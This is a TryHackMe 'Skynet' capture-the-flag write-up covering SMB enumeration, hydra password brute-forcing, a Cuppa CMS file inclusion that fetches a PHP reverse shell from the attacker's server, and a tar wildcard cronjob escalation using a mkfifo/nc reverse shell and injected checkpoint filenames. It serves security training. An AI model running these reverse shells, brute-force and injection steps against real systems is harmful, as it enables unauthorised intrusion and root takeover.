Skynet (THM)

TryHackMe - Skynet Write-Up

topics: web exploitation, smb, password cracking, insecure cronjobs, Linux Privilege Escalation

  1. Enumeration

  2. Local Privilege Escalation

  3. Root Privilege Escalation

Enumeration

initial nmap scan ./autonmap.sh $ip Basic

We have several ports open, lets first enumerate the website and SMB.

HTTP

Navigating to the main page we see a simple Skynet logo and nothing else

We can run a dirsearch scan before attempting to view anything else on the site

python3 dirsearch.py -u $ip -e php,html,txt

There appears to be two directories that we have prelimenayr access to, admin and squirrelmail, the latter of which sounds as if it is an email service.

The service requires credentials, lets return following enumeration of SMB.

SMB

Running a quick enum4linux scan returns sensitive information including unique shares and usernames

We can see the user milesdyson as well as unique shares anonymous and milesdyson. We can first enumerate the anonymous share as we have anonymous access privilege

smbclient //$ip/anonymous

We can fetch these contents with smbget

smbget -R smb://$ip/anonymous

Local Privilege Escalation

Among these files we see a message from Miles Dyson asking his employees to change their passwords. We also see within log1.txt a list of potential passwords. We have a user milesdyson, a list of passwords and a site to login with squirrelmail. Lets use hydra to brute force the correct password. Obtain the necessary information from the developer tools.

login.php returns that all passwords are valid so instead lets attempt to use the redirect.php page which loads when invalid credentials are entered

hydra -l milesdyson -P /tmp/sky/logs/log1.txt $ip http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."

We see the credentials milesdyson:cyborg007haloterminator are valid for squirrelmail.

Logging in we immediately see miles's SMB password to inspect his personal share

Using the credentials milesdyson:)s{A&2Z=F^n_E.B` we are able to view his personal share.

smbclient //$ip/milesdyson -U milesdyson

There appears to be a text file among these books. Inspecting the contents reveal a hidden directory on the website /45kra24zxs28v3yd

The website itself is just an image of Miles Dyson, lets run another dirsearch scan

python3 dirsearch.py -u $ip/45kra24zxs28v3yd -e php,html,txt

The administrator directory reveals that this website is run by Cuppa CMS.

Searching this with searchsploit returns an LFI vulnerability where we can upload any file we choose, including a PHP reverse shell.

Below is the syntax for the exploit.

Now all we have to do is start an HTTP server, send a curl request to fetch the PHP shell and listen for it

python3 -m http.server 80
rlwrap nc -nlvp 53
curl http://$ip/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://attackIP/shell.php

Root Privilege Escalation

We do not have sudo permissions so I decided to run a LinEnum.sh script. Immediately I noticed a cronjob running

Inspecting the file contents reveal the following

This appears to be a textbook tar * wildcard vulnerability. We can run the following commands to leverage this vulnerability and escalate our privileges to root with a reverse shell. Because the script navigates to "/var/www/html" we'll have place the script there

cd /var/www/html
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.18.145 443 > /tmp/f" >> shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

Following this, we simply wait for the cronjob to execute and listen for the shell.

PreviousKnockKnock (THM)NextSkynet (original)

Last updated